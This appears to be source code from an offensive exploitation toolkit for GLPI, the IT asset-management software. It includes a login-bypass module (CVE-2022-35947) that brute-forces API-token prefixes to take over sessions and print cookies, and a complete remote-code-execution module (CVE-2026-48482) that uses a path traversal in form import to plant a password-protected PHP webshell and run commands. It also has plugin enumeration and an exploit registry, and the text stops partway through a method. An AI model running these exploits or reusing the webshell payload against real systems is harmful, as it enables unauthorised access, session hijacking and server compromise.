        infos += "[b]getFromDBbyToken[/b] with an array, building [i]api_token LIKE '<prefix>%'[/i].\n"
        infos += "A prefix matching exactly one token logs that user in (302 off the login page),\n"
        infos += "with no API access, App-Token or IP-filter in the way. Fix 10.0.3: is_string guard.\n"

        infos += "\n[u]Params (run):[/u]\n"
        infos += " - [i]combination_size (default 1)[/i]: LIKE prefix length over [0-9a-z];\n"
        infos += "   raise up to 3 to separate users whose tokens share their first character\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Confirm the bypass (isolates one token, logs in)[/]\n--check\n\n"
        infos += "[grey66]# Log in as every isolable api_token user and print identity + cookie[/]\n--run\n\n"
        infos += "[grey66]# Wider isolation (slower)[/]\n--run -O combination_size=3\n"

        infos += "\nExploit is [green b]Safe[/] (read-only: only obtains sessions, changes nothing)."
        return infos

    # No check(): with no check method the framework's --check-all reports the target
    # vulnerable on a version match (and not vulnerable otherwise), which is the right
    # signal here. A behavioural check would have to walk the token keyspace; use --run to
    # isolate a token and obtain a session.

    def run(self, combination_size="1"):
        try:
            size = max(1, min(3, int(combination_size)))
        except Exception:
            size = 2
        total = len(self._ALPHABET) ** size
        Log.log(f"Logging in as every isolable api_token user via /front/login.php "
                f"(size-{size} prefixes, up to {total} probes) ...")
        seen, n = set(), 0
        for prefix in self._combos(size):
            sess = self._login_with_prefix(prefix)
            if not sess:
                continue
            # grab the authenticated cookie BEFORE any further request can rotate it
            cookie = "; ".join(f"{k}={v}" for k, v in dict(sess.cookies).items()
                               if k.startswith("glpi_"))
            uid, name = self._whoami(sess)
            key = uid or cookie or prefix
            if key in seen:
                continue
            seen.add(key)
            n += 1
            who = (f"{name} (id {uid})" if name else f"id {uid}") if uid else "an api_token user"
            Log.msg(f"  Logged in as [green b]{who}[/green b] via login-page user_token (LIKE '{prefix}%')")
            if cookie:
                Log.msg(f"      Session-Cookie: {cookie}")
        if not n:
            Log.err("No session obtained (patched, external-token login disabled, or no api_token users). "
                    "Try -O combination_size=2 if tokens may share their first character.")
            return False
        Log.msg(f"Obtained {n} session(s) from the login page with no credentials (CVE-2022-35947)")
        return True



# 2022 CVES
from .cve_2020_15175 import CVE_2020_15175
from .cve_2022_31061 import CVE_2022_31061
from .cve_2022_35914 import CVE_2022_35914
from .cve_2022_35947 import CVE_2022_35947
from .unserialize_order_plugin import UNSERIALIZE_ORDER_2022

# 2023 CVES
from .cve_2023_41323 import CVE_2023_41323
from .cve_2023_41326 import CVE_2023_41326
from .php_upload import PHP_UPLOAD

# 2024 CVES
from .cve_2024_27937 import CVE_2024_27937
from .cve_2024_29889 import CVE_2024_29889
from .cve_2024_37148 import CVE_2024_37148
from .cve_2024_37149 import CVE_2024_37149
from .cve_2024_40638 import CVE_2024_40638
from .cve_2024_50339 import CVE_2024_50339

# 2025 CVES
from .cve_2025_24799 import CVE_2025_24799
from .cve_2025_32786 import CVE_2025_32786

# 2026 CVES
from .cve_2026_26026 import CVE_2026_26026
from .cve_2026_26263 import CVE_2026_26263
from .cve_2026_48482 import CVE_2026_48482
from .cve_2026_52848 import CVE_2026_52848

# GLPI classic check
from .default_password_check import DEFAULT_PASSWORD_CHECK

def get_all_exploits():
    """
    Return the exploit available as Class

    :return: The class of exploits available
    :rtype: List[class:`exploits.exploit.GlpiExploit`]
    """

    all_exploits = [CVE_2020_15175, CVE_2022_31061, CVE_2022_35914, CVE_2022_35947, UNSERIALIZE_ORDER_2022, CVE_2023_41323, CVE_2023_41326]
    all_exploits += [PHP_UPLOAD, CVE_2024_27937, CVE_2024_29889, CVE_2024_37148, CVE_2024_37149]
    all_exploits += [CVE_2024_40638, CVE_2024_50339, CVE_2025_24799, CVE_2025_32786, CVE_2026_26026]
    all_exploits += [CVE_2026_26263, CVE_2026_48482, CVE_2026_52848]
    all_exploits += [DEFAULT_PASSWORD_CHECK]
    return all_exploits



import sys
from time import sleep
from rich import print as rp
from rich.prompt import Confirm
from rich.markup import escape
from datetime import datetime

class Log:
    """
    Class printing message on terminal
    """

    log_file = "log.glpwnme"
    quiet = False
    debug = False

    @classmethod
    def log(cls, m, save=False, **kwargs):
        """
        Log a message on the console

        :param m: The message to log
        :type m: str

        :param save: Whether or not to save the message in the log
        :type save: bool
        """
        if cls.quiet:
            return
        if save:
            cls.write(m)
        escaped = escape("[!]")
        rp(f"[bright_yellow]{escaped}[/bright_yellow] {m}", **kwargs)

    @classmethod
    def msg(cls, m, save=False, **kwargs):
        """
        Print a successfull message on the console

        :param m: The message to log
        :type m: str

        :param save: Whether or not to save the message in the log
        :type save: bool
        """
        if cls.quiet:
            return
        if save:
            cls.write(m)
        escaped = escape("[+]")
        rp(f"[green]{escaped}[/green] {m}", **kwargs)

    @classmethod
    def err(cls, m, save=False, **kwargs):
        """
        Print an error message on the console

        :param m: The message to log
        :type m: Union[str, Exception]

        :param save: Whether or not to save the message in the log
        :type save: bool
        """
        if cls.quiet:
            return
        if save:
            cls.write(m)

        escaped = escape("[-]")
        if isinstance(m, Exception):
            rp(f"[red]{escaped}[/red] {m.__class__.__name__}: {m}", **kwargs)
        else:
            rp(f"[red]{escaped}[/red] {m}", **kwargs)

    @classmethod
    def print(cls, m, **kwargs):
        """
        Just print a message with rich
        this avoid importing rich and Log
        """
        if cls.quiet:
            return
        rp(m, **kwargs)

    @classmethod
    def debug(cls, m, **kwargs):
        """
        Just print a message with rich
        this avoid importing rich and Log
        """
        if not cls.debug:
            return
        escaped = escape("[DEBUG]")
        rp(f"[gold3]{escaped}[/gold3] {m}", **kwargs)

    @staticmethod
    def ask(msg, **kwargs):
        """
        Wrapper for Confirm.ask method from rich
        """
        escaped = escape("[?]")
        return Confirm.ask(f"[blue]{escaped}[/blue] {msg}", **kwargs)

    @classmethod
    def pad(cls, n=2):
        """
        Add padding to print
        """
        if cls.quiet:
            return
        print(" " * n, end="")
        return cls

    @classmethod
    def write(cls, msg):
        """
        Write a msg in the log file to not lose some important
        log
        """
        now = datetime.now()
        log_date = now.strftime("[%Y-%m-%d %H:%M:%S] ").encode()
        if isinstance(msg, str):
            msg = msg.encode()

        with open(cls.log_file, "ab") as log:
            log.write(log_date + msg)
            log.write(b"\n")

class KiddieLogger:
    """
    Just a logger that display text with a fixed interval
    """
    interval = 0.05

    @classmethod
    def display(cls, text, color=None, end="\n"):
        """
        Display the text

        :param text: The text do display on screen
        :type text: str

        :param color: The color to use (ANSI code)
        :type color: optional(str)

        :param newline: End char
        :type newline: str (default: "\n")
        """
        if color:
            sys.stdout.write(f"{color}")

        for letter in text:
            sys.stdout.write(letter)
            sys.stdout.flush()
            sleep(cls.interval)

        if color:
            sys.stdout.write(f"\x1b[0m")

        if end:
            sys.stdout.write(end)



import re
from http import HTTPStatus
from .exploit import GlpiExploit
from .requirements import DefaultVersion
from .logger import Log
from bs4 import BeautifulSoup
from packaging import version
from rich.progress import track
from glpwnme.exploits.utils import GlpiUtils

class VulnerablePlugin:
    """
    Class for vulnerable plugins
    """
    def __init__(self, version_min, version_max, link, msg):
        self.min_version = version.parse(version_min)
        self.max_version = version.parse(version_max)
        self.link = link
        self.msg = msg

    def is_version_vuln(self, version_found):
        """
        Check if the given version is vulnerable

        :param version_found: The version to check
        :type version_found: str

        :return: Whether the version is vulnerable
        :rtype: bool
        """
        if not version_found:
            return (self.min_version == version.parse(DefaultVersion.minimal)
                    and self.max_version == version.parse(DefaultVersion.maximal))

        version_found = version.parse(version_found)
        return (version_found >= self.min_version
                and version_found <= self.max_version)

    def get_message(self):
        """
        Return the message formatted

        :return: The message to show
        :rtype: str
        """
        infos = "\t" + self.msg + ", @see:\n\t"
        infos += "\n\t".join(self.link)
        return infos

PLUGINS_VULNS = {"order": VulnerablePlugin("0",
                                           "2.10.0",
                                           ["https://github.com/pluginsGLPI/order/blob/2.7.6/ajax/dropdownValue.php",
                                            "https://github.com/pluginsGLPI/order/blob/2.10.0/ajax/dropdownContact.php"],
                                           "Unserialize call from POST Request"),
                 }

class PluginVersion:
    """
    Class that allows recovering version for some plugins
    """
    def __init__(self):
        self.plugins_version = {"fusioninventory": {"callbacks": [{"endpoint": "plugin.xml",
                                                                   "extract": PluginVersion.extract_version_from_xml},
                                                                  {"endpoint": "front/plugin_fusioninventory.communication.php",
                                                                   "extract": PluginVersion.extract_version_from_header}]},

                                "glpiinventory": {"callbacks": [{"endpoint": "front/plugin_fusioninventory.communication.php?action=yest&machineid=45645",
                                                                   "extract": PluginVersion.extract_version_from_header},
                                                                {"endpoint": "plugin.xml",
                                                                   "extract": PluginVersion.extract_version_from_xml}]},

                                "fields": {"callbacks": [{"endpoint": "plugin.xml",
                                                          "extract": PluginVersion.extract_version_from_xml}]},

                                "escalade": {"callbacks": [{"endpoint": "escalade.xml",
                                                            "extract": PluginVersion.extract_version_from_xml}]},

                                "metademands": {"callbacks": [{"endpoint": "metademands.xml",
                                                               "extract": PluginVersion.extract_version_from_xml}]},

                                "mreporting": {"callbacks": [{"endpoint": "mreporting.xml",
                                                              "extract": PluginVersion.extract_version_from_xml}]},

                                "oauthimap": {"callbacks": [{"endpoint": "oauthimap.xml",
                                                             "extract": PluginVersion.extract_version_from_xml}]},

                                "formcreator": {"callbacks": [{"endpoint": "plugin.xml",
                                                               "extract": PluginVersion.extract_version_from_xml}]},

                                "tasklists": {"callbacks": [{"endpoint": "tasklists.xml",
                                                             "extract": PluginVersion.extract_version_from_xml}]},

                                "shellcommands": {"callbacks": [{"endpoint": "shellcommands.xml",
                                                                 "extract": PluginVersion.extract_version_from_xml}]},

                                "archimap": {"callbacks": [{"endpoint": "archimap.xml",
                                                            "extract": PluginVersion.extract_version_from_xml}]},

                                "news": {"callbacks": [{"endpoint": "plugin.xml",
                                                        "extract": PluginVersion.extract_version_from_xml}]},

                                "accounts": {"callbacks": [{"endpoint": "accounts.xml",
                                                            "extract": PluginVersion.extract_version_from_xml}]},

                                "satisfaction": {"callbacks": [{"endpoint": "satisfaction.xml",
                                                                "extract": PluginVersion.extract_version_from_xml}]},

                                "order": {"callbacks": [{"endpoint": "plugin.xml",
                                                            "extract": PluginVersion.extract_version_from_xml}]},

                                "manufacturersimports": {"callbacks": [{"endpoint": "manufacturersimports.xml",
                                                            "extract": PluginVersion.extract_version_from_xml}]},

                                "treeview": {"callbacks": [{"endpoint": "treeview.xml",
                                                            "extract": PluginVersion.extract_version_from_xml}]},

                                "genericobject": {"callbacks": [{"endpoint": "genericobject.xml",
                                                                 "extract": PluginVersion.extract_version_from_xml}]}}

    @staticmethod
    def extract_version_from_header(result):
        """
        Retrieve the result of a plugin through the headers

        :param result: The result of the endpoint
        :type result: class:`Response`
        """
        header = result.headers.get("server-type")
        if header:
            version = header.strip().split(" ")[-1]
            return version
        return None

    @staticmethod
    def extract_version_from_xml(plugin_xml):
        """
        Extract the version of a plugin from its xml file

        :param plugin_xml: The plugin xml recovered
        :type plugin_xml: class:`Response`

        :return: The version found from the plugin file
        :rtype: str
        """
        plugin_xml = plugin_xml.text
        version_plugin = re.search(r'<num>((\d|\.)+?)</num>', plugin_xml)
        if version_plugin:
            return version_plugin.group(1)
        return None

class PluginEnums(GlpiExploit):
    """
    This class allows plugin enumeration a target

    @see https://plugins.glpi-project.org/#/
    """
    _impacts = 'Enumerate plugins in used'

    DEFAULT_PLUGIN_FILE = "README.md"
    VERSION_PLUGIN_FILE = "CHANGELOG.md"

    plugins_list = ['useditemsexport', 'glpiinventory', 'fusioninventory', 'addressing', 'archibp', 'collaborativetools',
                    'behaviors', 'datainjection', 'metademands', 'escalade', 'dashboard', 'mreporting', 'ocsinventoryng',
                    'jamf', 'fields', 'pdf', 'unread', 'formcreator', 'activity', 'purchaserequest', 'glpiwithbookstack',
                    'archidata', 'reports', 'dataflows', 'genericobject', 'order', 'archisw', 'news', 'oauthimap',
                    'tasklists', 'shellcommands', 'archimap', 'accounts', 'positions', 'satisfaction', 'ldaptools',
                    'advanceddashboard', 'agentconfig', 'manufacturersimports', 'mreporting', 'treeview', 'uninstall']

    endpoints = ["/plugins", "/marketplace"]

    exploit_implementations = {"fusioninventory": "FUSIONINVENTORY_PLUGIN_SQL",
                               "fields": "FIELDS_PLUGIN_SQL",
                               "genericobject": "GENERICOBJECT_PLUGIN_SQL",
                               "order": "PLUGIN_ORDER_2022"}

    def __init__(self, glpi_session):
        super().__init__(glpi_session)
        self.plugins_found = {}
        self.plugin_version = PluginVersion()

    @staticmethod
    def get_version(changelog):
        """
        Extract the version from a changelog
        """
        version_regex = re.compile(r"\[((\d+|\.)+)?\]")
        version = re.findall(version_regex, changelog)
        if version:
            tuple_res = version[0]
            if tuple_res:
                return tuple_res[0]

    def plugin_exists(self, plugin, expected_status=[HTTPStatus.OK, HTTPStatus.FORBIDDEN]):
        """
        Check if a plugin exists or not on the target

        :param plugin: The name of the plugin
        :type plugin: str

        :return: Whether or not the plugin exists on the target
        :rtype: bool
        """
        is_plugin_found = False
        for endpoint in self.endpoints:
            res = self.get(f"{endpoint}/{plugin}/", allow_redirects=False)
            if res.status_code in expected_status:
                self.plugins_found[plugin] = {"endpoint": endpoint}
                is_plugin_found = True
                break
        return is_plugin_found

    def recover_version_from_plugin(self, plugin):
        """
        Try to recover the version of a plugin, set the internal variable
        of the plugins found

        :param plugin: The name of the plugin
        :type plugin: str
        """
        endpoint = self.plugins_found[plugin]["endpoint"]

        # First try to get the version from implemented function
        callbacks_available = self.plugin_version.plugins_version.get(plugin)
        if callbacks_available:
            list_callbacks = callbacks_available["callbacks"]
            for procedure in list_callbacks:
                endpoint_version = procedure["endpoint"]
                callable_version = procedure["extract"]
                if callable(callable_version):
                    version = callable_version(self.get(f"{endpoint}/{plugin}/{endpoint_version}"))
                    if version:
                        self.plugins_found[plugin]["version"] = version
                        return
                else:
                    Log.err(f"Procedure not callable found for plugin: {plugin}")

        res = self.get(f"{endpoint}/{plugin}/{self.VERSION_PLUGIN_FILE}", allow_redirects=False)

        version = PluginEnums.get_version(res.text)
        if version:
            self.plugins_found[plugin]["version"] = version

    def show_plugins_found(self):
        """
        Display the result of the plugins found
        """
        if not self.plugins_found:
            Log.log(f"No plugins found")

        else:
            for plugin in self.plugins_found.keys():
                endpoint = self.plugins_found[plugin].get("endpoint")
                msg = f"Plugin [blue]{plugin}[/blue] found on [blue]{endpoint}[/blue]"
                version = self.plugins_found[plugin].get("version")
                if version:
                    msg += f", version ~= [blue]{version}[/blue]"

                vuln_plugin = PLUGINS_VULNS.get(plugin)
                if(vuln_plugin
                   and vuln_plugin.is_version_vuln(version)):
                    msg += " - [red b]Vulnerable[/red b]\n"
                    msg += vuln_plugin.get_message()

                    exploit_class = self.exploit_implementations.get(plugin)
                    if exploit_class:
                        msg += f"\n\t[i]You can exploit it by running: [gold3]--exploit {exploit_class} --run[/gold3][/i]\n"

                Log.msg(msg)

    def run(self):
        """
        Enums the plugins on the target
        """
        for plugin in track(self.plugins_list, description="[blue]Looting plugins...[/]"):
            if self.plugin_exists(plugin):
                self.recover_version_from_plugin(plugin)



import json
import html
import uuid
import base64
import ntpath
import posixpath
from http import HTTPStatus
from bs4 import BeautifulSoup
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from glpwnme.exploits.utils import GlpiUtils


class CVE_2026_48482(GlpiExploit):
    """
    Authenticated RCE via path traversal in the GLPI Form import feature
    (GLPI 11.0.0 - 11.0.7).

    The form import wizard (front route /Form/Import/Execute, controller
    Glpi\\Controller\\Form\\Import\\Step4ExecuteController) deserializes an
    attacker-supplied JSON describing one or more forms. Each form can carry a
    custom "illustration" object {key, data, checksum}. FormSerializer::
    prepareIllustrationDataForImport() handles it with NO sanitization:

        $data     = base64_decode($illustration->data);
        $tmp_path = GLPI_TMP_DIR . "/" . $illustration->key;   // attacker key
        file_put_contents($tmp_path, $data);                   // write-what-where

    `key` is concatenated into the path unchecked, giving an arbitrary file
    write (content = base64-decoded `data`). The write happens BEFORE the
    checksum is validated and BEFORE the form row is created, so the file lands
    on disk even though the import later errors out. A traversal key escaping
    GLPI_TMP_DIR (<var>/files/_tmp) into the web root (<root>/public) drops a
    PHP webshell => remote code execution.

    Entry point is gated by Form::canCreate() (rightname 'form', CREATE bit).
    Out of the box only the Super-Admin profile holds that right; an admin may
    delegate it to a lower profile, in which case that profile is enough.

    Fix in 11.0.8: the key is rejected unless it matches /^[a-zA-Z0-9._-]+$/,
    blocking the traversal.

    @author Ne0re0
    @cvss 7.2
    @name CVE_2026_48482
    """
    _impacts = "Remote Code Execution, Arbitrary File Write"
    _privilege = "Superadmin"  # needs the 'form' CREATE right (Super-Admin by default)
    _is_check_opsec_safe = True  # check only performs a GET on the import page
    min_version = "11.0.0"
    max_version = "11.0.8"  # max is strict (<), so vulnerable up to and including 11.0.7

    _IMPORT_URL = "/Form/Import/Execute"
    _IMPORT_PAGE = "/Form/Import"
    _SHELL_PASSWD = "P@ssw0rd123"

    # Candidate traversal keys, tried in order when the user does not force --key.
    # The write starts inside GLPI_TMP_DIR (<var>/files/_tmp); each candidate
    # climbs out into a web-served, php-executing docroot (.../public).
    # {shell} is substituted with the dropped file name.
    _KEY_CANDIDATES = [
        "../../public/{shell}",                       # standard source install: <root>/files/_tmp
        "../../../../var/www/glpi/public/{shell}",    # official glpi/glpi docker image (split data dir)
        "../../../../var/www/html/public/{shell}",    # common bare-metal / other docker layout
    ]

    def _build_webshell(self, passwd):
        """
        Build a self-contained webshell guarded by ``passwd``. The repo's
        GlpiUtils.get_glpi_shell() includes `inc/includes.php`, which fatals
        (HTTP 500, no output) when dropped in GLPI 11's public/ docroot. This
        standalone shell needs no GLPI bootstrap and keeps the same
        passwd/_hidden_cmd + <code> convention so the output parser is unchanged.

        :param passwd: The password protecting the webshell
        :return: The raw webshell bytes
        """
        # Escape for a PHP single-quoted literal: only \ and ' are special there.
        php_pass = passwd.replace("\\", "\\\\").replace("'", "\\'").encode()
        return (
            b"<?php error_reporting(0);"
            b"if(isset($_GET['passwd'])&&$_GET['passwd']==='" + php_pass + b"'){"
            b"if(!empty($_GET['_hidden_cmd'])){echo '<code>';$o=array();"
            b"@exec($_GET['_hidden_cmd'],$o);echo htmlentities(implode(\"\\n\",$o));"
            b"echo '</code>';}}"
        )

    def _resolve_key(self, shell_name):
        """
        Compute the exact traversal key from the server's own paths instead of
        guessing. Both ends are read straight from the System Information tab
        (the same config page GLPI_TMP_DIR is dumped on): GLPI_TMP_DIR is where
        the write starts and GLPI_ROOT is the application root, whose 'public/'
        subdir is the web docroot in GLPI 11. The key is the relative path from
        GLPI_TMP_DIR to <GLPI_ROOT>/public/<shell_name>.

        GLPI_ROOT is preferred over the hash-bruteforced glpi_infos.root_dir
        because the latter is often unknown; root_dir is only a last resort.

        :param shell_name: The name of the file to drop under the docroot
        :return: The traversal key, or None if the paths could not be resolved
        """
        try:
            tmp_dir = self.glpi_session.extract_glpi_var("GLPI_TMP_DIR")
            root_dir = self.glpi_session.extract_glpi_var("GLPI_ROOT")
        except Exception:
            tmp_dir = root_dir = None
        root_dir = (root_dir or self.glpi_session.glpi_infos.root_dir or "").strip()
        if not tmp_dir or not root_dir:
            return None

        tmp_dir = tmp_dir.strip()
        # Windows installs report a 'C:\...' root; pick the matching path math.
        pathmod = ntpath if ":\\" in root_dir or "\\" in tmp_dir else posixpath
        target = pathmod.join(root_dir, "public", shell_name)
        # file_put_contents(GLPI_TMP_DIR . "/" . key) accepts forward slashes on
        # every platform, so normalize the (possibly back-slashed) relative path.
        return pathmod.relpath(target, tmp_dir).replace("\\", "/")

    def infos(self):
        infos = "[u]Description:[/u]\n"
        infos += ("Authenticated path traversal in the [b]Form import[/b] feature leads to an "
                  "arbitrary file write. [b]FormSerializer::prepareIllustrationDataForImport()[/b] "
                  "writes [i]GLPI_TMP_DIR . '/' . illustration.key[/i] with attacker-controlled "
                  "content and no sanitization. A [b]../[/b] key escapes into [b]public/[/b] to "
                  "drop a PHP webshell => RCE.\n")

        infos += "\n[u]Privilege:[/u]\n"
        infos += ("Requires the [b]'form' CREATE[/b] right. Only [b]Super-Admin[/b] holds it by "
                  "default, so provide Super-Admin credentials (or any account the admin granted "
                  "Forms create).\n")

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]cmd[/i] (default 'id'): command executed through the built-in webshell\n"
        infos += " - [i]shell[/i] (default random .php): name of the dropped file under the docroot\n"
        infos += " - [i]file[/i] (default none): local .php file to drop instead of the built-in shell\n"
        infos += f" - [i]passwd[/i] (default '{self._SHELL_PASSWD}'): password guarding the built-in webshell\n"
        infos += " - [i]key[/i] (default auto): force the traversal key written into GLPI_TMP_DIR\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Check the account holds the Forms create right[/]\n"
        infos += "--check\n"
        infos += "\n[grey66]# Drop a webshell and run 'id'[/]\n"
        infos += "--run\n"
        infos += "\n[grey66]# Custom command with a custom webshell password[/]\n"
        infos += "--run -O cmd='uname -a' passwd='s3cr3t'\n"
        infos += "\n[grey66]# Drop your own php file, forcing the docker traversal key[/]\n"
        infos += "--run -O file='myshell.php' key='../../../../var/www/glpi/public/pwn.php'\n"

        infos += "\nExploit drops a file on disk, [yellow b]use --clean[/] to neutralize it."
        return infos

    def check(self):
        """
        Confirm the current account can reach the import wizard, i.e. it holds
        the 'form' CREATE right that Step1IndexController gates on. A GET only,
        so this is opsec safe.

        :return: Whether the import wizard is reachable
        :rtype: bool
        """
        res = self.get(self._IMPORT_PAGE, allow_redirects=False)
        if res.status_code in (HTTPStatus.FOUND, HTTPStatus.SEE_OTHER):
            return False
        if res.status_code == HTTPStatus.FORBIDDEN or GlpiUtils.is_access_denied(res.content):
            return False
        return res.status_code == HTTPStatus.OK

    def _build_payload(self, key, shell_content):
        """
        Build a minimal but complete form-export spec (version 1) with a single
        form whose malicious illustration triggers the file write. Fields are
        arranged so execution reaches file_put_contents() before anything fails:
        importBasicFormProperties() resolves the entity (mapped below) and then
        prepares the illustration, all before the form row is created.

        :param key: The traversal key written into GLPI_TMP_DIR
        :param shell_content: The raw webshell bytes
        :return: The JSON string to send as the `json` POST field
        """
        spec = {
            "version": 1,
            "forms": [{
                "id": 1,
                "uuid": str(uuid.uuid4()),
                "name": "CVE-2026-48482",
                "header": None,
                "description": None,
                "category_name": "",       # empty -> category lookup skipped
                "entity_name": "PWN",       # resolved via the replacements below
                "is_recursive": True,
                "is_active": False,
                "render_layout": "step_by_step",
                "submit_button_visibility_strategy": "ALWAYS_VISIBLE",
                "illustration": {
                    "key": key,
                    "data": base64.b64encode(shell_content).decode(),
                    "checksum": "0" * 32,   # only verified AFTER the write
                },
                "submit_button_conditions": [],
                "sections": [],
                "comments": [],
                "questions": [],
                "policies": [],
                "destinations": [],
                "translations": [],
                "data_requirements": [],    # empty -> validateRequirements() passes
                "custom_types_requirements": [],
                "plugin_requirements": [],
            }],
        }
        return json.dumps(spec)

    def _import(self, key, shell_content):
        """
        Send one import request that writes the webshell at `key`. The CSRF
        token is added automatically by GlpiSession.post().
        """
        data = {
            "json": self._build_payload(key, shell_content),
            # Map the fake entity name so DatabaseMapper::getItemId(Entity, ...)
            # succeeds and execution reaches the illustration write.
            "replacements[0][itemtype]": "Entity",
            "replacements[0][original_name]": "PWN",
            "replacements[0][replacement_id]": "0",
        }
        return self.post(self._IMPORT_URL, data=data, allow_redirects=False)

    def _run_cmd(self, shell_name, cmd, passwd):
        """
        Trigger the dropped webshell and return the command output, or None if
        the shell is not reachable / did not execute.
        """
        res = self.get(
            "/" + shell_name,
            params={"passwd": passwd, "_hidden_cmd": cmd},
            allow_redirects=False,
        )
        if res.status_code != HTTPStatus.OK:
            return None
        code = BeautifulSoup(res.content, "html.parser").find("code")
        if code is None:
            return None
        return code.get_text("\n").strip()

    def _candidate_keys(self, shell_name, key=None):
        """
        Build the ordered list of traversal keys to try. A forced --key wins;
        otherwise the exact key resolved from the server paths is tried first,
        then the hardcoded layout fallbacks.

        :param shell_name: The name of the file dropped under the docroot
        :param key: A traversal key forced by the user, if any
        :return: The ordered list of keys to attempt
        """
        if key:
            return [key]
        candidates = []
        resolved = self._resolve_key(shell_name)
        if resolved:
            candidates.append(resolved)
        candidates += [c.format(shell=shell_name) for c in self._KEY_CANDIDATES]
        return candidates

    def run(self, cmd="id", shell=None, file=None, passwd=None, key=None, quiet=False):
        """
        Drop a webshell via the form-import traversal and execute a command.

        :param cmd: The command to run through the built-in webshell (default 'id')
        :param shell: The name of the dropped php file (default random)
        :param file: Local .php file to drop instead of the built-in webshell
        :param passwd: Password guarding the built-in webshell (default _SHELL_PASSWD)
        :param key: Force the traversal key (default: auto-resolve then fallbacks)
        """
        Log.quiet = quiet
        passwd = passwd or self._SHELL_PASSWD

        if file:
            with open(file, "rb") as f:
                shell_content = f.read()
        else:
            shell_content = self._build_webshell(passwd)

        if key:
            # When the key is forced, the file lands at the key's basename; the
            # reachability test URL must use that same name, not a random one.
            shell_name = shell or key.rstrip("/").rsplit("/", 1)[-1]
        else:
            shell_name = shell or f"{GlpiUtils.random_str(8)}.php"
        candidates = self._candidate_keys(shell_name, key)

        for candidate in candidates:
            Log.msg(f"Dropping [b]{shell_name}[/b] via traversal key: [yellow]{candidate}[/yellow]")
            res = self._import(candidate, shell_content)
            if GlpiUtils.is_access_denied(res.content):
                Log.err("Access denied: the account lacks the 'form' CREATE right")
                return None

            if file:
                # User-supplied shell: we cannot parse its output, just confirm
                # the file is served (HTTP 200) at the expected location.
                if self.get("/" + shell_name, allow_redirects=False).status_code == HTTPStatus.OK:
                    shell_url = self.glpi_session.r("/" + shell_name)
                    Log.print(f"[green b][+] Custom webshell landed at: {shell_url}[/]")
                    self._write_log(f"Custom webshell dropped at {shell_url} (key: {candidate})")
                    return shell_url
            else:
                output = self._run_cmd(shell_name, cmd, passwd)
                if output is not None:
                    shell_url = self.glpi_session.r("/" + shell_name)
                    Log.print(f"[green b][+] RCE confirmed, webshell landed at: {shell_url}[/]")
                    Log.msg(f"Output of [italic]{cmd}[/italic]:")
                    Log.print(output)
                    Log.msg(f"Run more: {shell_url}?passwd={passwd}&_hidden_cmd=<cmd>")
                    self._write_log(f"Webshell dropped at {shell_url} (key: {candidate})")
                    return shell_url

            Log.err("File written but not reachable with this key, trying next layout...")

        Log.err("Could not land a reachable webshell. The write primitive still")
        Log.err("succeeded on disk; force the right path with -O key='../../<docroot>/x.php'.")
        return None

    def clean(self, shell=None, key=None):
        """
        Neutralize a dropped shell by overwriting it with empty content through
        the same write primitive (the bug offers no delete primitive, so the
        empty file remains but is no longer executable code).
        """
        if not shell:
            Log.err("Provide the dropped file name: --clean -O shell='<name>.php'")
            return
        candidates = self._candidate_keys(shell, key)
        for candidate in candidates:
            self._import(candidate, b"")
        Log.msg(f"Overwrote [b]{shell}[/b] with empty content via the import write primitive.")
        Log.msg("The empty file may remain on disk; remove it manually if you have shell access.")



import re
from http import HTTPStatus
from packaging import version
from abc import ABC, abstractmethod
from glpwnme.exploits.exploit import GlpiExploit
from glpwnme.exploits.logger import Log

class PluginExploit(GlpiExploit):
    """
    This class implements the base class
    for a glpi exploit
    """
    _plugin_endpoints = ("marketplace", "plugins")

    def __init__(self, glpi_session):
        super().__init__(glpi_session)
        self.endpoint = None
        self.plugin_exists = None
        self.glpi_plugin_version = None

    @staticmethod
    def extract_version_from_xml(plugin_xml):
        """
        Extract the version of a plugin from its xml file

        :param plugin_xml: The plugin xml recovered
        :type plugin_xml: class:`Response`

        :return: The version found from the plugin file
        :rtype: str
        """
        plugin_xml = plugin_xml.text
        version_plugin = re.search(r'<num>((\d|\.)+?)</num>', plugin_xml)
        if version_plugin:
            return version_plugin.group(1)
        return None

    def _plugins_exists(self, endpoint):
        """
        Check if the plugin exists given an endpoint, set the attribute to know that
        the plugin actually exists, and returns it at every other calls

        :return: True if the plugin exists, False otherwise
        :rtype: bool
        :meta: public
        """
        raise NotImplementedError(f"{self.__class__.__name__}::_plugins_exists not implemented")

    def exists(self):
        """
        Check that the plugin exists
        """
        if self.plugin_exists is not None:
            return self.plugin_exists

        for endp in self.__class__._plugin_endpoints:
            if self._plugins_exists(endp):
                self.endpoint = endp
                self.plugin_exists = True
                break

        if self.plugin_exists is None:
            self.plugin_exists = False
        return self.plugin_exists

    def _get_version_from_xml(self, xml_file=None):
        """
        Recover the version of a plugin from its .xml file

        :return: The version found from the plugin file
        :rtype: str
        """
        if not xml_file:
            xml_file = getattr(self.__class__, "plugin_xml_file", "plugin.xml")

        res = self.plugin_get(xml_file)
        if res.status_code == HTTPStatus.FORBIDDEN:
            self.glpi_session.glpi_infos.is_config_safe = True
            return None

        self.glpi_session.glpi_infos.is_config_safe = False
        return self.__class__.extract_version_from_xml(res)

    def _is_plugin_vulnerable(self, plugin_version):
        """
        Check if the plugin is vulnerable
        """
        plugin_version = version.parse(plugin_version)
        for min_version, max_version in zip(self.requirements.plugin_version.min_version,
                                            self.requirements.plugin_version.max_version):
            min_version = version.parse(min_version)
            max_version = version.parse(max_version)
            if plugin_version >= min_version and plugin_version < max_version:
                return True
        return False

    def requirement_check(self):
        """
        Check all the necessary requirement for the exploit

        :rtype: bool
        """
        if not self.exists():
            Log.err(f"Plugin {self.__class__.plugin_name} not found")
            return False

        if super().requirement_check():
            self.glpi_plugin_version = self.get_plugin_version()
            if(self.requirements.plugin_version is not None and not self.requirements.plugin_version.is_default()):
                if(self.glpi_plugin_version and not self._is_plugin_vulnerable(self.glpi_plugin_version)):
                    Log.err(f"Plugin version is not vulnerable")
                    return False
            return True
        return False

    def are_requirements_checked(self):
        """
        Check all the necessary requirement for the exploit
        but without any print, call only if the class has no check method

        :rtype: bool
        """
        if not self.exists():
            return False

        if super().are_requirements_checked():
            self.glpi_plugin_version = self.get_plugin_version()
            if self.glpi_plugin_version is not None:
                if not self._is_plugin_vulnerable(self.glpi_plugin_version):
